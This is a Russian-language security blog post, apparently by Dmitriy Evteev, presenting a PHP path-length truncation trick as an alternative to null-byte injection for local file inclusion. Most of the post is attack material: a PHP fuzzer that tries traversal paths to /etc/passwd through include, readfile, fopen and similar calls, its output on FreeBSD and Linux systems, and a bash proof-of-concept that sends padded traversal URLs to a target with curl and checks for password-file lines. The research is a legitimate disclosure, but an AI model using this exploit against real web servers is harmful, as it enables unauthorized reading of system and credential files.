Другая альтернатива null-byte

Многие из вас, безусловно, помнят, как около года назад Raz0r поднял тему альтернативы " ядовитому нулю ", а группа ush провела соответствующие исследования в этом направлении [ 1 , 2 , 3 ]. К слову, в это же время ваш покорный слуга пополнил новым методом базу знаний XSpider / MaxPatrol , дополнив реализацию метода своими наработками [ 4 ]. Так к чему я вновь затронул эту тему? Дело в том, что в упомянутом методе основная идея была затереть конец файла (расширение), который в свою очередь попадает в инклуд. Это возможно, потому как PHP использует нормализацию пути и не может обратиться к файлу превышающему MAX_PATH. А почему бы используя все те же ограничения PHP (длина MAX_PATH), не попробовать заполнить длину имени файла, но только от начала файла? Именно такая идея пришла в голову молодому человеку (Гольцев Юрий), которому был задан соответствующий вопрос на собеседовании. И ведь действительно! Это должно работать. name='more'> Для того чтобы проверить другую альтернативу null-byte я написал простенький фаззер: <? error_reporting(E_NONE); $str = ''; for ($i=0;$i<4096;$i++) { $str=$str.'n'; $f = $str.'/../../../../../../../../../etc/passwd'; #include() if (include($f.'.txt')) { print "
".($i+1)."tinclude(".$f.".txt)
"; } if (include('q/'.$f.'.txt')) { print "
".($i+1)."tinclude(q/".$f.".txt)
"; } if (include('qq/'.$f.'.txt')) { print "
".($i+1)."tinclude(qq/".$f.".txt)
"; } if (include('./'.$f.'.txt')) { print "
".($i+1)."tinclude(./".$f.".txt)
"; } #file_get_contents() if (file_get_contents($f.'.txt')) { print "
".($i+1)."tfile_get_contents(".$f.".txt)
"; } if (file_get_contents('q/'.$f.'.txt')) { print "
".($i+1)."tfile_get_contents(q/".$f.".txt)
"; } if (file_get_contents('qq/'.$f.'.txt')) { print "
".($i+1)."tfile_get_contents(qq/".$f.".txt)
"; } if (file_get_contents('./'.$f.'.txt')) { print "
".($i+1)."tfile_get_contents(./".$f.".txt)
"; } #include_once() if (include_once($f.'.txt')) { print "
".($i+1)."tinclude_once(".$f.".txt)
"; } if (include_once('q/'.$f.'.txt')) { print "
".($i+1)."tinclude_once(q/".$f.".txt)
"; } if (include_once('qq/'.$f.'.txt')) { print "
".($i+1)."tinclude_once(qq/".$f.".txt)
"; } if (include_once('./'.$f.'.txt')) { print "
".($i+1)."tinclude_once(./".$f.".txt)
"; } #readfile() if (readfile($f.'.txt')) { print "
".($i+1)."treadfile(".$f.".txt)
"; } if (readfile('q/'.$f.'.txt')) { print "
".($i+1)."treadfile(q/".$f.".txt)
"; } if (readfile('qq/'.$f.'.txt')) { print "
".($i+1)."treadfile(qq/".$f.".txt)
"; } if (readfile('./'.$f.'.txt')) { print "
".($i+1)."treadfile(./".$f.".txt)
"; } #fopen() if (fopen($f.'.txt','r')) { print "
".($i+1)."tfopen(".$f.".txt,'r')
"; } if (fopen('q/'.$f.'.txt','r')) { print "
".($i+1)."tfopen(q/".$f.".txt,'r')
"; } if (fopen('qq/'.$f.'.txt','r')) { print "
".($i+1)."tfopen(qq/".$f.".txt,'r')
"; } if (fopen('./'.$f.'.txt','r')) { print "
".($i+1)."tfopen(./".$f.".txt,'r')
"; } } ?> Результаты его работы: ~ # uname -a FreeBSD web.local 8.0-RELEASE-p2 FreeBSD 8.0-RELEASE-p2 #0: Wed Feb 10 09:09:51 MSK 2010 root@pt.local:/usr/obj/usr/src/sys/LOCAL i386 ~ # php -v PHP 5.2.12 with Suhosin-Patch 0.9.7 (cli) (built: Feb 17 2010 01:05:37) Copyright (c) 1997-2009 The PHP Group Zend Engine v2.2.0, Copyright (c) 1998-2009 Zend Technologies include(qq/n[..960..]n/../../../../../../../../../etc/passwd.txt) include_once(qq/n[..960..]n/../../../../../../../../../etc/passwd.txt) include(q/n[..961..]n/../../../../../../../../../etc/passwd.txt) include_once(q/n[..961..]n/../../../../../../../../../etc/passwd.txt) include(n[..963..]n/../../../../../../../../../etc/passwd.txt) include_once(n[..963..]n/../../../../../../../../../etc/passwd.txt) include(qq/n[..971..]n/../../../../../../../../../etc/passwd.txt) include_once(qq/n[..971..]n/../../../../../../../../../etc/passwd.txt) include(q/n[..972..]n/../../../../../../../../../etc/passwd.txt) include_once(q/n[..972..]n/../../../../../../../../../etc/passwd.txt) include(n[..974..]n/../../../../../../../../../etc/passwd.txt) include_once(n[..974..]n/../../../../../../../../../etc/passwd.txt) ~ # uname -a Linux bt 2.6.21.5 #4 SMP Thu Apr 10 04:23:56 GMT 2008 i686 Intel(R) Pentium(R) M processor 1.86GHz GenuineIntel GNU/Linux ~ # php -v PHP 5.2.4 (cli) (built: Sep 11 2007 21:55:04) Copyright (c) 1997-2007 The PHP Group Zend Engine v2.2.0, Copyright (c) 1998-2007 Zend Technologies include(qq/n[..4041..]n/../../../../../../../../../etc/passwd.txt) include_once(qq/n[..4041..]n/../../../../../../../../../etc/passwd.txt) include(q/n[..4042..]n/../../../../../../../../../etc/passwd.txt) include_once(q/n[..4042..]n/../../../../../../../../../etc/passwd.txt) include(n[..4044..]n/../../../../../../../../../etc/passwd.txt) include_once(n[..4044..]n/../../../../../../../../../etc/passwd.txt) include(qq/n[..4048..]n/../../../../../../../../../etc/passwd.txt) include_once(qq/n[..4048..]n/../../../../../../../../../etc/passwd.txt) include(q/n[..4049..]n/../../../../../../../../../etc/passwd.txt) include_once(q/n[..4049..]n/../../../../../../../../../etc/passwd.txt) include(n[..4051..]n/../../../../../../../../../etc/passwd.txt) include_once(n[..4051..]n/../../../../../../../../../etc/passwd.txt) Нужно добавить, что для функций require() и require_once(), аналогично функциям include() и include_once(), приведенные выше данные справедливы в полном объеме. И пример эксплуатации local file including обсуждаемым методом (proof of concept): #!/usr/local/bin/bash file='/etc/passwd' str=`php -r "echo str_repeat('/..', 300);"` for ((i=1; i <= 100 ; i++)) do pre=$pre'n' URL="$1$pre$str$file" response=`curl -kis $URL | egrep "^root" | wc -l` if [ $response = 1 ]; then echo "Found: $URL"; fi done bash poc.sh "http://192.168.0.51/test.php?file="

Как можно заметить это работает!

Другая альтернатива null-byte

Реальные атаки. Эффективные решения. Практический опыт.

Dmitriy Evteev

Другая альтернатива null-byte

Реальные атаки. Эффективные решения. Практический опыт.

Dmitriy Evteev

Подпишитесь на email рассылку